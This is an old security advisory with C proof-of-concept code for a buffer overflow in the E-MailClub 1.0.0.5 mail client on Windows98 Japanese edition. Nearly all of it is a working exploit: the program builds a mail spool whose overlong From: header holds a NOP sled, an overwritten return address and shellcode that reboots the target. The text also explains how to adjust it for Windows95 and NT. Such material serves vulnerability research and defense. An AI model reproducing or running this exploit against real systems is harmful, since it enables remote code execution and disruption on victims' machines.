Buffer overflow in E-MailClub Ver1.0.0.5. It overflows when that receives the long From: in POP3 handling. If the host recives the mail which contains the exploit code, the host has been cracked by any instructions which are coded in the exploit code. This example generates the e-mail which contains the exploit code that reboot the target host. This exploit is coded for Windows98 Japanese edition, but if you change some parameters written in the sample exploit program, it will may works on Windows95 and WindowsNT.
eb5bb461b617975286628c613e3683c4e15675996639c870d9fababc85a7a212
/*=========================================================================
E-MailClub Ver1.0.0.5 for Windows98J exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=========================================================================
*/
#include <stdio.h>
#include <string.h>
#define HD1 \
"From exploit Wed Oct 27 01:53 JST 1999\n"\
"Date: Wed, 27 Oct 1999 01:53:00 +0900\n"
#define HD2 \
"Message-Id: <3815C9EBDC.E749HOGE@192.168.0.1>\n"\
"MIME-Version: 1.0\n"\
"Content-Transfer-Encoding: 7bit\n"\
"Content-Type: text/plain; charset=US-ASCII\n"\
"Content-Length: 1\n"\
"Status: U\n\n\n\n"
#define MAXBUF 2000
#define MAXBUF2 500
#define NOP 0x90
#define RETADR 511
#define EIP 0x7fc1415b
unsigned char exploit_code[100]={
0xb8,0x55,0x55,0x55,
0x55,0x50,0x50,0xB8,
0x96,0x91,0xFA,0x5F,
0x03,0xC0,0x50,0xc3,
};
main(int argc, char *argv[])
{
FILE *fp;
char buf[MAXBUF];
unsigned int ip;
if (argc!=2){
printf("usage: %s mailspool\n",argv[0]);
exit(1);
}
if ((fp=fopen(argv[1],"wb"))==NULL){
printf("Can not write to %s\n",argv[1]);
exit(1);
}
memset(buf,NOP,MAXBUF);
buf[MAXBUF-1]=0;
ip=EIP;
buf[RETADR-1]=0xa0;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strncpy(buf+RETADR+40,exploit_code,strlen(exploit_code));
fprintf(fp,"%s",HD1);
fprintf(fp,"From: %s <exploit@sample.code.net>\n",buf);
fprintf(fp,"To: you@your.host.net\n");
fprintf(fp,"Subject: subscribe exploit\n");
fprintf(fp,"%s",HD2);
fclose(fp);
}